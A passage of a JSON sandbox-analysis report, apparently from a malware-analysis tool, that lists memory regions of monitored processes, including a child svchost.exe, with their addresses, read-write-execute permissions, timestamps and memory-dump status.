"start_va": 2424832, "timestamp": "00:01:39.408", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001333-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_429", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1333", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.410", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001340-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_435", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1340", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.418", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001343-addr_0x0000000000250000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_438", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1343", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.420", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1346", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:39.422", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "svchost.exe", "filename": "c:\\windows\\system32\\svchost.exe", "id": "proc_8", "image_name": "svchost.exe", "monitor_reason": "child_process", "monitored_id": 8, "origin_monitor_id": 7, "ref_parent_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000008-region_00001099-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_241", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1099", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:39.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1100", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:39.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1101", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:39.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1376255, "entry_point": 0, "filename": null, "id": "region_1102", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:01:39.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2001993728, "type": "region", "version": 1 }, "end_va": 2003734527, "entry_point": 2001993728, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1103", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2001993728, "timestamp": "00:01:39.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1104", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:39.160", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1105", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:39.160", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147430400, "type": "region", "version": 1 }, "end_va": 2147434495, "entry_point": 0, "filename": null, "id": "region_1106", "name": "private_0x000000007fff3000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147430400, "timestamp": "00:01:39.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 4284088320, "type": "region", "version": 1 }, "end_va": 4284133375, "entry_point": 4284088320, "filename": "\\Windows\\System32\\svchost.exe", "id": "region_1107", "name": "svchost.exe", "norm_filename": "c:\\windows\\system32\\svchost.exe", "region_type": "memory_mapped_file", "start_va": 4284088320, "timestamp": "00:01:39.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791790059520, "type": "region", "version": 1 }, "end_va": 8791790063615, "entry_point": 8791790059520, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1108", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791790059520, "timestamp": "00:01:39.169", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_1109", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:39.174", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8796092850176, "type": "region", "version": 1 }, "end_va": 8796092854271, "entry_point": 0, "filename": null, "id": "region_1110", "name": "private_0x000007fffffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092850176, "timestamp": "00:01:39.174", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_1111", "name": "private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:01:39.174", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 331775, "entry_point": 0, "filename": null, "id": "region_1113", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:01:39.179", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_1114", "name": "private_0x0000000000060000", "norm_filename": null, "region_type": "private_memory", "start_va": 393216, "timestamp": "00:01:39.180", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1115", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:39.187", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1798143, "entry_point": 1376256, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1116", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1376256, "timestamp": "00:01:39.187", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 3670015, "entry_point": 0, "filename": null, "id": "region_1117", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:01:39.188", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1999765504, "type": "region", "version": 1 }, "end_va": 2000941055, "entry_point": 1999855264, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1118", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1999765504, "timestamp": "00:01:39.188", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1119", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:39.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1120", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:39.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791754539008, "type": "region", "version": 1 }, "end_va": 8791754977279, "entry_point": 8791754551520, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1121", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754539008, "timestamp": "00:01:39.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 4718591, "entry_point": 0, "filename": null, "id": "region_1122", "name": "private_0x0000000000380000", "norm_filename": null, "region_type": "private_memory", "start_va": 3670016, "timestamp": "00:01:39.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 5308416, "type": "region", "version": 1 }, "end_va": 5373951, "entry_point": 0, "filename": null, "id": "region_1123", "name": "private_0x0000000000510000", "norm_filename": null, "region_type": "private_memory", "start_va": 5308416, "timestamp": "00:01:39.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 5368709120, "type": "region", "version": 1 }, "end_va": 5368860671, "entry_point": 0, "filename": null, "id": "region_1124", "name": "private_0x0000000140000000", "norm_filename": null, "region_type": "private_memory", "start_va": 5368709120, "timestamp": "00:01:39.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791756505088, "type": "region", "version": 1 }, "end_va": 8791757737983, "entry_point": 8791756827984, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1125", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791756505088, "timestamp": "00:01:39.198", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791778394112, "type": "region", "version": 1 }, "end_va": 8791779045375, "entry_point": 8791778403744, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1126", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791778394112, "timestamp": "00:01:39.198", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791787241472, "type": "region", "version": 1 }, "end_va": 8791787368447, "entry_point": 8791787266280, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1127", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791787241472, "timestamp": "00:01:39.199", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001134-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_248", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1134", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.208", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001136-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_250", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1136", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.209", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001137-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_251", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1137", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.211", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001139-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_253", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1139", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.212", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001140-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_254", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1140", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.214", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001142-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_256", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1142", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.215", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001143-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_257", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1143", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.217", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001145-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_259", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1145", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.218", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001146-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_260", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1146", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.219", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001148-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_262", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1148", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.220", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001149-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_263", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1149", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.223", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001152-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_266", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1152", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.231", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001154-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_268", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1154", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.232", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001155-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_269", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1155", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.233", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001157-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_271", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1157", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.234", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001158-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_272", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1158", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.237", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001160-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_274", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1160", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.239", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001161-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_275", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1161", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.241", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001163-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_277", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1163", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.242", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001164-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_278", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1164", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.244", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001166-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_280", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1166", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.245", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001167-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_281", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1167", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.246", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001170-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_284", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1170", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, 